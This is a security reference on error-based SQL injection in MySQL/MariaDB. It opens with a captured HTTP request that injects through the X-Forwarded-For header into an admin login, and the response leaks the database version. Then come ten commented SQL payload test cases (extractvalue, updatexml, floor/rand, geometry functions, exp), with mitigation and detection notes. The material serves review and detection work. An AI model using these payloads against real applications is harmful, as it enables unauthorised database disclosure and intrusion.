- POST /Model/admin/login.php?action=login HTTP/1.1
- Host: XXX.com
- X-Forwarded-For: ' or updatexml(1,concat(0x7e,(version())),0) or'
- User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
- Accept-Encoding: gzip, deflate
- Referer: http://XXX.com/Model/admin/login.php
- Cookie: PHPSESSID=i2m9hu9jtm8l4o71hvct9h0h05
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 25
- username=abc&password=123
返回包
- HTTP/1.1 200 OK
- Server: kangle/3.5.8.2
- Date: Tue, 11 Apr 2017 03:21:49 GMT
- X-Powered-By: PHP/5.4.45
- Expires: Thu, 19 Nov 1981 08:52:00 GMT
- Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
- Pragma: no-cache
- Content-type: text/html
- Connection: close
- Content-Length: 540
- 
- <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />MySQL Query:insert into dg_logs(adminid,admin,type,addtime,ip,memo) values('22','abc','0','1491880909','' or updatexml(1,concat(0x7e,(version())),0) or'','管理员abc登录后台') <br> MySQL Error:XPATH syntax error: '~10.1.16-MariaDB' <br> MySQL Errno:1105 <br> Message:MySQL Query Error
-- Error-based SQL injection reference for MySQL/MariaDB, kept as test cases
-- for reviewing input handling and detection rules.
-- Each statement appends one expression to the sample query
-- `SELECT * FROM test WHERE id=1`; the expression forces a server error whose
-- message carries the result of the inner query (user() here). Nothing is
-- disclosed unless the application echoes the raw database error to the client.
-- Mitigation: bind every request-derived value (form fields and headers such
-- as X-Forwarded-For alike) through prepared statements, and log database
-- errors server-side instead of rendering them in the response.
-- Detection: alert on these function names in request parameters or headers,
-- and on errno 1105 / "XPATH syntax error" entries in the database error log.

-- 1. floor(): grouping on concat(user(), floor(rand(0)*2)) typically fails
--    with a duplicate-entry error that quotes the concatenated value.
SELECT *
FROM test
WHERE id=1
  AND (
      SELECT 1
      FROM (
          SELECT count(*), concat(user(), floor(rand(0)*2)) AS x
          FROM information_schema.tables
          GROUP BY x
      ) AS a
  );

-- 2. extractvalue(): the second argument is not valid XPath, so the server
--    reports an XPATH syntax error that quotes it.
SELECT *
FROM test
WHERE id=1
  AND (extractvalue(1, concat(0x7e, (SELECT user()), 0x7e)));

-- 3. updatexml(): same XPATH syntax error path as extractvalue().
SELECT *
FROM test
WHERE id=1
  AND (updatexml(1, concat(0x7e, (SELECT user()), 0x7e), 1));

-- 4-9. Geometry constructors: the argument is not a geometry value, so the
--      call errors. NOTE(review): whether the error text includes the inner
--      query's result is version-dependent (reported for older MySQL
--      releases) - confirm against the deployed server version.

-- 4. geometrycollection()
SELECT *
FROM test
WHERE id=1
  AND geometrycollection((SELECT * FROM (SELECT * FROM (SELECT user()) AS a) AS b));

-- 5. multipoint()
SELECT *
FROM test
WHERE id=1
  AND multipoint((SELECT * FROM (SELECT * FROM (SELECT user()) AS a) AS b));

-- 6. polygon()
SELECT *
FROM test
WHERE id=1
  AND polygon((SELECT * FROM (SELECT * FROM (SELECT user()) AS a) AS b));

-- 7. multipolygon()
SELECT *
FROM test
WHERE id=1
  AND multipolygon((SELECT * FROM (SELECT * FROM (SELECT user()) AS a) AS b));

-- 8. linestring()
SELECT *
FROM test
WHERE id=1
  AND linestring((SELECT * FROM (SELECT * FROM (SELECT user()) AS a) AS b));

-- 9. multilinestring()
SELECT *
FROM test
WHERE id=1
  AND multilinestring((SELECT * FROM (SELECT * FROM (SELECT user()) AS a) AS b));

-- 10. exp(): bitwise NOT (~) of the subquery yields a very large integer, so
--     exp() goes out of range. NOTE(review): the error text quoting the inner
--     result is version-dependent - confirm against the deployed version.
SELECT *
FROM test
WHERE id=1
  AND exp(~(SELECT * FROM (SELECT user()) AS a));